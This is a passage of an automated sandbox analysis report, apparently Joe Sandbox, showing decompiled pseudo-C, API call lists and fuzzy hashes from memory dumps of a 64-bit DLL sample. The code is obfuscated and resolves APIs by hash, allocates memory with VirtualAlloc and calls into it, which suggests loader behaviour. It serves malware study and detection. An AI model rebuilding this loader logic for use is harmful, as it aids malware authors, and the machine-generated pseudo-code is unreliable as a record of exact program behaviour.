                                				E00007FFC7FFC130FD230(( *(_t216 + 0x1d0) & 0x0000ffff ^  *(_t216 + 0x130) ^  *(_t216 + 0xa8)) -  *_t251 ^  *(_t251 + 0x188), r15d, _t216,  *(_t251 + 0xe0) *  *(_t251 + 0x60) * _t153, __rdx);
                                				return _t253 + 0x216;
                                			}


























                                APIs
                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFC130EA81E
                                  • Part of subcall function 00007FFC130E11F0: GetProcessHeap.KERNEL32 ref: 00007FFC130E1490
                                  • Part of subcall function 00007FFC130E11F0: HeapFree.KERNEL32 ref: 00007FFC130E14A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$CriticalEnterFreeProcessSection
                                • String ID:
                                • API String ID: 427202882-0
                                • Opcode ID: 06d21744d6bd25f7f01f7bf7974a9ca1116d3c96e03c2e6b9feebbf35e4aacf2
                                • Instruction ID: 78221295fa8c2ba37ba84bb2e190045f8c22a7c505b6ff4ee90f700e3c5fed37
                                • Opcode Fuzzy Hash: 06d21744d6bd25f7f01f7bf7974a9ca1116d3c96e03c2e6b9feebbf35e4aacf2
                                • Instruction Fuzzy Hash: 76B179732086D58AD721CF15E444BEEB7A8F788B48F414125EB8A17B58DB78EA95CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 71%
                                			E00007FFC7FFC130F9610(signed int __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, long long __r12, long long __r13, long long __r14, long long __r15, long long _a8, signed int _a16, signed int _a32, signed int _a40, signed int _a64, signed int* _a72, signed int _a80, signed int _a96) {
                                				long long _v32;
                                				long long _v40;
                                				long long _v48;
                                				long long _v56;
                                				signed int _v64;
                                				signed int _v72;
                                				signed int _v80;
                                				signed int _v88;
                                				signed int* _v96;
                                				intOrPtr _v104;
                                				intOrPtr _v112;
                                				intOrPtr _v120;
                                				signed int _v128;
                                				signed int _v136;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t84;
                                				signed int _t88;
                                				signed int _t98;
                                				signed int _t103;
                                				signed int _t107;
                                				signed int _t117;
                                				signed int* _t124;
                                				signed long long _t129;
                                				void* _t135;
                                				void* _t136;
                                				void* _t137;
                                
                                				_t117 = __rax;
                                				_t88 = __r9 - 0xefd;
                                				r8d = _a80;
                                				_t98 = __rdx - 0x3189;
                                				r8d = r8d + 0xaeb;
                                				_t103 = _a64 + 0xffffeb3f;
                                				_a16 = _t98;
                                				r10d = __rax - 0xbf1;
                                				_a64 = _t103;
                                				_t107 = __rax + 0x8d0;
                                				_a80 = r10d;
                                				_a96 = _t107;
                                				_a32 = __r9 - 0x1086;
                                				_a40 = _t88;
                                				if (_t88 == __r10 + 0x216) goto 0x130f98d3;
                                				_a8 = __rbx;
                                				_t124 = _a72;
                                				if (_t103 - __r10 + 0x114f >= 0) goto 0x130f9723;
                                				_v128 = 0x3189;
                                				r9d = 0x3a59;
                                				_v136 = 0x36e7;
                                				r8d = 0x2032;
                                				E00007FFC7FFC130E9AC0(_t124, __rcx, _t124, _t137); // executed
                                				_t124[0xdc] = _t117;
                                				_t124[0xcf] = 0;
                                				_t124[0x24] =  &(_t124[0x78]);
                                				 *((intOrPtr*)(_t124[0xc] + 0x100)) =  *((intOrPtr*)(_t124[0xc] + 0x100)) + _t124[0x44];
                                				_t124[0x44] = _t124[0x44] - 1;
                                				goto 0x130f98b8;
                                				_v40 = __r13;
                                				_t129 =  *_t124 | _t98;
                                				if (_t124[0x54] != _t129) goto 0x130f98cb;
                                				_v32 = __r12;
                                				_v48 = __r14;
                                				_v56 = __r15;
                                				asm("o16 nop [eax+eax]");
                                				if (r8d - _t129 < 0) goto 0x130f987f;
                                				LeaveCriticalSection(??);
                                				r12d = _t124[0x32];
                                				r8d = r12d;
                                				_t84 = _a32;
                                				r8d = r8d & _t107;
                                				r9d = _t124[0x74];
                                				r11d = _t124[0x68];
                                				r9d = r9d | _t103;
                                				r11d = r11d | _t124[0x50];
                                				r12d = r12d ^ 0x00001f2c;
                                				r10d = _a64;
                                				r12d = r12d - _t84;
                                				r10d = r10d | 0x00002032;
                                				r11d = r11d - _t124[0x1e];
                                				r14d = _t124[0x78];
                                				r10d = r10d & _a80;
                                				r14d = r14d | _t84;
                                				r15d =  *_t124;
                                				r15d = r15d - _t124[0x16];
                                				r15d = r15d - 0x2103;
                                				_v64 = r11d;
                                				_v72 = r12d;
                                				_v80 = _t124[0x8a] ^ 0x00003666;
                                				_v88 = r10d;
                                				_v96 = _t124;
                                				_v104 = _t124[0x10] - r12d;
                                				_v112 = _t84 + 0x38e9;
                                				_v120 = _t124[0x54] * _a40 - _a96;
                                				_v128 = r14d;
                                				_v136 = r15d;
                                				r8d = E00007FFC7FFC130EA4F0(r8d, _t124, _t129, _t124, _t136, __r8, __r9);
                                				_a80 = _a80 + _t124[0x1e] + _a96;
                                				r13d = r13d + 3;
                                				if (r13d == ( *_t124 | _a16)) goto 0x130f9760;
                                				return _t135 + 0x2103;
                                			}


                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CriticalLeaveSection
                                • String ID:
                                • API String ID: 3988221542-0
                                • Opcode ID: 4c7c26e474c2be739ad3d1bd9dd664af0724ce0dccd55edf23a61f10c074f1d5
                                • Instruction ID: ff27112cde60e09469b74aa2727b065e55600586ecd25aeb54ebdbcb6788062f
                                • Opcode Fuzzy Hash: 4c7c26e474c2be739ad3d1bd9dd664af0724ce0dccd55edf23a61f10c074f1d5
                                • Instruction Fuzzy Hash: 616144736086C58BE361CF25E4407DAB7A8F788B48F044139DB8957B58EB38E9A4CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 76%
                                			E00007FFC7FFC130E4C80() {
                                				intOrPtr _t88;
                                				void* _t111;
                                				void* _t120;
                                				long long _t131;
                                				intOrPtr _t139;
                                				long long _t141;
                                				intOrPtr* _t142;
                                				void* _t143;
                                				intOrPtr _t146;
                                				intOrPtr _t149;
                                				void* _t151;
                                				void* _t156;
                                				void* _t158;
                                				void* _t159;
                                				void* _t160;
                                				void* _t161;
                                				void* _t162;
                                				intOrPtr _t163;
                                				void* _t166;
                                				long long _t167;
                                				signed long long _t168;
                                				int _t169;
                                				long _t171;
                                				void* _t172;
                                				struct HINSTANCE__* _t173;
                                
                                				 *((long long*)(_t160 + 0x20)) = _t141;
                                				_t161 = _t160 - 0x90;
                                				r9d =  *((intOrPtr*)(_t161 + 0xf8));
                                				r10d = _t162 - 0x1f2c;
                                				 *((intOrPtr*)(_t161 + 0xe0)) = _t151 + 0xe49;
                                				_t9 = _t143 + 0x18b5; // 0x37e1
                                				r14d = _t9;
                                				r11d = _t120 - 0x927;
                                				 *((intOrPtr*)(_t161 + 0xd0)) = r10d;
                                				r13d = _t120 - 0x11a9;
                                				 *((intOrPtr*)(_t161 + 0xd8)) = _t162 + 0x1669;
                                				r15d = _t120 - 0x30d5;
                                				 *((intOrPtr*)(_t161 + 0xf8)) = _t162 + 0x360;
                                				 *((intOrPtr*)(_t161 + 0x80)) = _t166 - 0x1b2d;
                                				 *((intOrPtr*)(_t161 + 0x110)) =  *((intOrPtr*)(_t161 + 0x118)) + 0xfa;
                                				r8d = _t151 + 0x522;
                                				 *((intOrPtr*)(_t161 + 0x118)) = _t166 - 0x1a27;
                                				if (r11d - _t141 + 0x354 > 0) goto 0x130e55e4;
                                				_t142 =  *((intOrPtr*)(_t161 + 0x120));
                                				if (r8d == _t159 + 0x1408) goto 0x130e5576;
                                				r8d = 0x36e7;
                                				 *( *((intOrPtr*)(_t142 + 0x248)) + 4) =  *(_t142 + 0x130) ^ 0x506c4282;
                                				 *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x248)) + 8)) =  *((intOrPtr*)( *_t142 + 0xb0)) + 0x657447bf;
                                				 *( *((intOrPtr*)(_t142 + 0x248)) + 0xc) =  *( *((intOrPtr*)(_t142 + 0x1c8)) + 0x130) ^ 0x00005794;
                                				if ( *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x1a0)) + 0x130)) + 0x12f0 == r8d) goto 0x130e4e0d;
                                				r8d = r8d + 1;
                                				 *( *((intOrPtr*)(_t142 + 0x40)) + 0x198) =  *( *((intOrPtr*)(_t142 + 0x40)) + 0x198) ^  *(_t142 + 0xc8) ^ 0x000030d5;
                                				_t131 = r8d;
                                				if (_t131 != _t151) goto 0x130e4dd0;
                                				GetProcAddress(_t173);
                                				_t163 =  *((intOrPtr*)(_t142 + 0xc0));
                                				r10d = 0x3666;
                                				 *((long long*)(_t142 + 0x1d8)) = _t131;
                                				 *(_t142 + 0x28) =  *(_t142 + 0x1f8) ^ _t168;
                                				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x118)) + 0x88 +  *(_t142 + 0x268) * 8));
                                				_t167 = _t166 + _t163;
                                				 *((long long*)(_t142 + 0x2b0)) = _t167;
                                				if (_t167 == _t163) goto 0x130e50e2;
                                				_t146 =  *_t142;
                                				 *((long long*)(_t142 + 0x18)) =  *((intOrPtr*)(_t146 + 0x120)) - 0x27ae;
                                				_t60 = _t146 - 0x2598; // -4517
                                				 *(_t142 + 0x70) =  *(_t142 + 0x70) | _t60;
                                				_t139 =  *((intOrPtr*)(_t142 + 0x1a0));
                                				_t65 = _t146 + 4; // 0x4
                                				r9d = _t65;
                                				r8d =  *(_t139 + 0x130) * 0x38dc7000;
                                				VirtualAlloc(_t172, _t171);
                                				if (_t139 == 0) goto 0x130e50e2;
                                				E00007FFC7FFC130EBFF0(0, _t151 + 0xe49, _t166 - 0x1b2d, _t111, _t139,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x2b0)))), _t139, _t158,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x2b0)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x2b0)))));
                                				 *((long long*)(_t142 + 0x1e0)) = 0x3cfb;
                                				_t88 =  *((intOrPtr*)(_t142 + 0x2b8))(_t156, _t158, _t159);
                                				_t149 =  *((intOrPtr*)(_t142 + 0x1c8));
                                				 *((intOrPtr*)(_t142 + 0x2c0)) = _t88;
                                				if (_t88 !=  *((intOrPtr*)(_t149 + 0x150)) - 0x23f8) goto 0x130e4f46;
                                				 *((long long*)(_t142 + 0xa0)) = 0;
                                				 *(_t142 + 0x10) =  *(_t142 + 0x10) | _t149 + 0x000030d5;
                                				ExitProcess(_t169);
                                			}


                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: File$AddressAllocExitLockNamedPeekPipeProcProcessVirtual
                                • String ID: 6$662
                                • API String ID: 1002299123-1739385493
                                • Opcode ID: 61df2113f86e00cbc328842b638f91bd404d7e04f205a54db81927e6c79994c6
                                • Instruction ID: 010ea19b4cb679e23e49d4b22239f9463e74c26198d5082d6ccf0d305458cb2d
                                • Opcode Fuzzy Hash: 61df2113f86e00cbc328842b638f91bd404d7e04f205a54db81927e6c79994c6
                                • Instruction Fuzzy Hash: D2626372605A88C6EB55CF29E4987E933A8F788B9CF05453ACE4D5B398DF38D550CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 39%
                                			E00000201201640C6DF0(long long __rbx, intOrPtr* __rcx, long long __rdx) {
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t96;
                                				void* _t116;
                                				void* _t121;
                                				intOrPtr _t123;
                                				void* _t130;
                                				char _t131;
                                				void* _t156;
                                				long long* _t198;
                                				long long* _t199;
                                				long long* _t201;
                                				char* _t218;
                                				char* _t219;
                                				long _t252;
                                				intOrPtr* _t253;
                                				long _t255;
                                				void* _t260;
                                				char* _t262;
                                				long long _t263;
                                				signed long long _t269;
                                				void* _t271;
                                				void* _t272;
                                				void* _t292;
                                				void* _t293;
                                				long _t300;
                                				long _t305;
                                				void* _t307;
                                
                                				_t292 = _t271;
                                				 *((long long*)(_t292 + 8)) = __rbx;
                                				 *((long long*)(_t292 + 0x10)) = __rdx;
                                				_t272 = _t271 - 0x40;
                                				r14d =  *0x640cd450;
                                				_t253 = __rcx;
                                				 *((long long*)(_t272 + 0x38)) =  *((intOrPtr*)( *0x640cd458 + 8));
                                				if (E00000201201640C91C8(_t121, r14d ^ 0x55e7ce26,  *((intOrPtr*)( *0x640cd458 + 8)), __rbx, __rdx, __rdx, __rcx, _t255, _t292 - 0x58, _t292 + 0x18, _t292) != 0) goto 0x640c7239;
                                				_t198 =  *_t253;
                                				 *((long long*)(_t272 + 0x98)) = _t198;
                                				 *((long long*)(_t272 + 0x30)) =  *((intOrPtr*)( *0x640cd458 + 8));
                                				if ( *((intOrPtr*)(_t272 + 0x20)) == 0) goto 0x640c703b;
                                				r13d = 0xfb849f8f;
                                				E00000201201640C908C(r13d, _t198,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t198 == 0) goto 0x640c6e8f;
                                				 *_t198();
                                				goto 0x640c6e91;
                                				r8d = 1;
                                				HeapAlloc(_t307, _t305, _t300);
                                				 *((long long*)(_t272 + 0x28)) = _t198;
                                				if (_t198 == 0) goto 0x640c722f;
                                				0x640c47b0();
                                				_t262 = _t198;
                                				if ( *_t262 == 0x20) goto 0x640c6edc;
                                				if ( *_t262 != 9) goto 0x640c6ee1;
                                				_t263 = _t262 + 1;
                                				goto 0x640c6ed0;
                                				if ( *_t263 == 0) goto 0x640c6f74;
                                				E00000201201640C908C(r13d, _t198,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t198 == 0) goto 0x640c6f03;
                                				 *_t198();
                                				goto 0x640c6f05;
                                				asm("cdq");
                                				_t15 = _t198 + 1; // 0x1
                                				r8d = _t15;
                                				HeapAlloc(_t293, _t252, _t255);
                                				if (_t198 == 0) goto 0x640c6f76;
                                				_t130 =  *_t263;
                                				if (_t130 == 0) goto 0x640c6f46;
                                				if (_t130 == 0x20) goto 0x640c6f42;
                                				_t218 = _t263 + 1;
                                				_t131 =  *_t218;
                                				if (_t131 != 0) goto 0x640c6f34;
                                				if (_t131 != 0) goto 0x640c6f48;
                                				if (_t218 == 0) goto 0x640c6f62;
                                				 *_t218 = 0;
                                				_t219 = _t218 + 1;
                                				if ( *_t219 == 0x20) goto 0x640c6f5d;
                                				if ( *_t219 != 9) goto 0x640c6f62;
                                				goto 0x640c6f53;
                                				 *_t198 = _t263;
                                				_t199 = _t198 +  *((intOrPtr*)( *0x640cd458 + 8));
                                				if (_t219 + 1 != 0) goto 0x640c6f2a;
                                				goto 0x640c6f7e;
                                				if (0 == 0) goto 0x640c7021;
                                				E00000201201640C908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x640cd458 + 0x10)));
                                				if (_t199 == 0) goto 0x640c6fa8;
                                				 *_t199();
                                				 *((long long*)(_t253 + 0x40)) =  *((intOrPtr*)(_t272 + 0x28));
                                				 *((long long*)(_t253 + 0x48)) =  *((intOrPtr*)(_t272 + 0x90));
                                				 *((intOrPtr*)(_t253 + 0x50)) = sil;
                                				if ( *((char*)(_t253 + 0x70)) == 0) goto 0x640c6fcb;
                                				 *((char*)(_t253 + 0x70)) = 0;
                                				asm("lock and dword [edi+0x2c], 0xfffffffe");
                                				E00000201201640C908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0x640cd458 + 0x10)));
                                				if (_t199 == 0) goto 0x640c6fea;
                                				 *_t199();
                                				if ( *((intOrPtr*)(_t253 + 0x40)) == 0) goto 0x640c7010;
                                				HeapFree(_t260, ??);
                                				HeapFree(??, ??, ??);
                                				goto 0x640c7040;
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				if (0x57 != 0) goto 0x640c723e;
                                				if (E00000201201640C91C8(0, r14d ^ 0x881e33f6, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x640c7239;
                                				_t96 = E00000201201640C672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98);
                                				_t123 =  *((intOrPtr*)(_t272 + 0x98));
                                				if (_t96 != 0) goto 0x640c70a8;
                                				if (_t123 == 0) goto 0x640c7239;
                                				 *((intOrPtr*)(_t253 + 0x28)) = _t123;
                                				if (E00000201201640C91C8(_t123, r14d ^ 0xa2dd2342, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x640c7166;
                                				_t46 = _t199 + 0x10; // 0x10
                                				_t116 = _t46;
                                				_t156 =  <  ?  *((void*)(_t272 + 0x90)) : _t116;
                                				E00000201201640C908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x640cd458 + 0x10)));
                                				if (_t199 == 0) goto 0x640c7109;
                                				 *_t199();
                                				r8d = _t156;
                                				0x640c47b0();
                                				if (_t156 - _t116 >= 0) goto 0x640c7134;
                                				r8d = _t116 - _t156;
                                				E00000201201640C487A();
                                				E00000201201640C908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0x640cd458 + 0x10)));
                                				if (_t199 == 0) goto 0x640c714e;
                                				 *_t199();
                                				HeapFree(??, ??, ??);
                                				_t269 =  *((intOrPtr*)(_t272 + 0x88));
                                				r14d = r14d ^ 0x1a1a0866;
                                				if (E00000201201640C91C8(_t123, r14d, _t199,  *((intOrPtr*)(_t272 + 0x30)), _t269,  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x640c723e;
                                				if (E00000201201640C672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98) == 0) goto 0x640c723e;
                                				if ( *((intOrPtr*)(_t272 + 0x98)) == 0) goto 0x640c723e;
                                				E00000201201640C908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x640cd458 + 0x10)));
                                				if (_t199 == 0) goto 0x640c71de;
                                				 *_t199();
                                				E00000201201640C908C(0x9c66d81c, _t199,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t199 == 0) goto 0x640c71f8;
                                				 *_t199();
                                				_t201 =  *((intOrPtr*)(_t272 + 0x28)) + _t269 * 0x23c34600;
                                				 *((long long*)(_t272 + 0x28)) = _t201;
                                				 *((long long*)(_t253 + 0x30)) = _t201;
                                				E00000201201640C908C(0x8d72aad2, _t201,  *((intOrPtr*)( *0x640cd458 + 0x10)));
                                				if (_t201 == 0) goto 0x640c723e;
                                				 *_t201();
                                				goto 0x640c723e;
                                				goto 0x640c7040;
                                				return 1;
                                			}

































                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID: uJ$uJ$uJ
                                • API String ID: 1659099196-303439786
                                • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction ID: 6bfac28fa50306e3b406ec3ddd69d9d628bb80908c4ee56f6c1f27e36c3bbc14
                                • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction Fuzzy Hash: 42C185222047A1C7EB70DB62E8493EA6798FB88784F584425BF4D4379BDF3AC466C744
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 15%
                                			E00000201201640C5638(long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r11) {
                                				void* __rbp;
                                				signed long long _t89;
                                				signed long long _t109;
                                				signed long long _t122;
                                				signed long long _t131;
                                				intOrPtr _t141;
                                				void* _t167;
                                				void* _t186;
                                				long long* _t187;
                                				long long _t188;
                                				long long _t190;
                                				long long _t192;
                                				long long* _t193;
                                				long long* _t234;
                                				long _t237;
                                				long _t240;
                                				void* _t243;
                                				void* _t248;
                                				void* _t249;
                                				void* _t264;
                                				void* _t269;
                                				void* _t270;
                                				long _t273;
                                				long _t277;
                                				void* _t281;
                                
                                				_t269 = __r11;
                                				_t192 = __rbx;
                                				_t186 = _t248;
                                				 *((long long*)(_t186 + 0x10)) = __rbx;
                                				 *((intOrPtr*)(_t186 + 0x20)) = r9d;
                                				 *((long long*)(_t186 + 0x18)) = __r8;
                                				 *((long long*)(_t186 + 8)) = __rcx;
                                				_t249 = _t248 - 0x50;
                                				_t244 =  *0x640cd458;
                                				_t187 =  *0x640cd448;
                                				 *((long long*)(_t249 + 0x38)) = _t187;
                                				E00000201201640C908C(0x38e683e4, _t187,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t187 == _t237) goto 0x640c5691;
                                				_t9 = _t237 + 0xa; // 0xa
                                				 *_t187();
                                				E00000201201640C908C(0x9c66d81c, _t187,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t187 == _t237) goto 0x640c56ab;
                                				 *_t187();
                                				_t12 = _t249 + 0x30; // -126
                                				_t89 = E00000201201640C5BA4(_t12);
                                				_t13 = _t249 + 0x30; // -126
                                				r11d = _t89;
                                				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                				_t18 = _t269 + 3; // 0x3
                                				E00000201201640C13EC(_t18, _t187, __rbx, _t13);
                                				 *((long long*)(_t249 + 0x40)) = _t187;
                                				if (_t187 == _t237) goto 0x640c59e0;
                                				r12d = 0xfb849f8f;
                                				E00000201201640C908C(r12d, _t187,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t187 == _t237) goto 0x640c5711;
                                				 *_t187();
                                				goto 0x640c5713;
                                				E00000201201640C908C(r12d, _t187,  *((intOrPtr*)(_t244 + 0x18)));
                                				if (_t187 == _t237) goto 0x640c572e;
                                				r13d =  *_t187();
                                				goto 0x640c5731;
                                				r13d = 0;
                                				_t23 = _t192 + 7; // 0x7
                                				r8d = _t273 + _t23;
                                				HeapAlloc(_t281, _t277, _t273);
                                				if (_t187 == _t237) goto 0x640c59d2;
                                				_t24 = _t192 + 1; // 0x1
                                				r8d = _t24;
                                				0x640c47b0();
                                				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0x640c57a3;
                                				if ( *((intOrPtr*)(_t249 + 0xa8)) == 0) goto 0x640c57a3;
                                				_t188 =  *((intOrPtr*)(_t249 + 0x38));
                                				r8d = 6;
                                				0x640c47b0();
                                				_t32 = _t273 + 1; // 0x1
                                				r8d = _t32;
                                				0x640c47b0();
                                				_t234 = _t187;
                                				if (E00000201201640CA238(_t9, 0, _t167,  *((intOrPtr*)(_t249 + 0xa8)), _t192,  *((intOrPtr*)(_t249 + 0x90)), _t234, _t249 + 0x48, _t264) != 0) goto 0x640c59c4;
                                				_t193 =  *((intOrPtr*)(_t249 + 0xb0));
                                				 *_t193 =  *((intOrPtr*)(_t249 + 0x48));
                                				E00000201201640C908C(0xfb849f8f, _t188,  *((intOrPtr*)(_t244 + 0x18)));
                                				if (_t188 == _t237) goto 0x640c57ea;
                                				 *_t188();
                                				goto 0x640c57ec;
                                				 *((intOrPtr*)(_t193 + 0x10)) = 0;
                                				_t41 = _t234 + 0x34; // 0x34
                                				r8d = _t41;
                                				 *((intOrPtr*)(_t193 + 0x14)) = 1;
                                				HeapAlloc(_t270, _t237, _t240);
                                				if (_t188 == _t237) goto 0x640c59b6;
                                				_t43 = _t249 + 0x30; // 0xfb849fcf
                                				_t109 = E00000201201640C5BA4(_t43);
                                				_t44 = _t249 + 0x30; // 0xfb849fcf
                                				r11d = _t109;
                                				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                				_t49 = _t269 + 3; // 0x3
                                				E00000201201640C13EC(_t49, _t188, _t193, _t44);
                                				if (_t188 == _t237) goto 0x640c59a8;
                                				0x640cb158();
                                				HeapFree(_t243, ??);
                                				 *((long long*)(_t193 + 8)) = _t188;
                                				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0x640c59fa;
                                				_t141 =  *((intOrPtr*)(_t249 + 0xa8));
                                				if (_t141 == 0) goto 0x640c59fa;
                                				r8d = _t141;
                                				_t190 = _t193 + 0x28;
                                				 *((long long*)(_t249 + 0x20)) = _t190;
                                				if (E00000201201640C7CF4(_t190, _t193,  *((intOrPtr*)(_t249 + 0x90)),  *((intOrPtr*)(_t249 + 0xa0)), _t188, _t193 + 0x18) != 0) goto 0x640c59a8;
                                				r15d = 0x77;
                                				 *((intOrPtr*)(_t193 + 0x2c)) = 1;
                                				HeapAlloc(??, ??, ??);
                                				if (_t190 == _t237) goto 0x640c59a3;
                                				_t62 = _t249 + 0x30; // 0xfb849fcf
                                				_t122 = E00000201201640C5BA4(_t62);
                                				_t63 = _t249 + 0x30; // 0xfb849fcf
                                				r11d = _t122;
                                				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                                				_t68 = _t269 + 3; // 0x3
                                				_t131 = E00000201201640C13EC(_t68, _t190, _t193, _t63);
                                				 *((long long*)(_t249 + 0x48)) = _t190;
                                				if (_t190 == _t237) goto 0x640c5995;
                                				0x640cb158();
                                				r11d = _t131;
                                				r15d = r15d - r11d;
                                				 *((long long*)(_t249 + 0x20)) =  *((intOrPtr*)(_t249 + 0x38)) + 0x201640d129f;
                                				0x640cb158();
                                				 *((long long*)(_t193 + 0x20)) = _t190;
                                				goto 0x640c59b9;
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				return 2;
                                			}





























                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction ID: 1bf8675f40aa0dd3a67cf9906baaae44fcc608543a6bc08328c955ffded82184
                                • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction Fuzzy Hash: 44A1E129214BA0C7D710DB26E80A2DAA7A9F7C4BC4F544111BF4E47B5EDE3AC966C708
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EE374(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
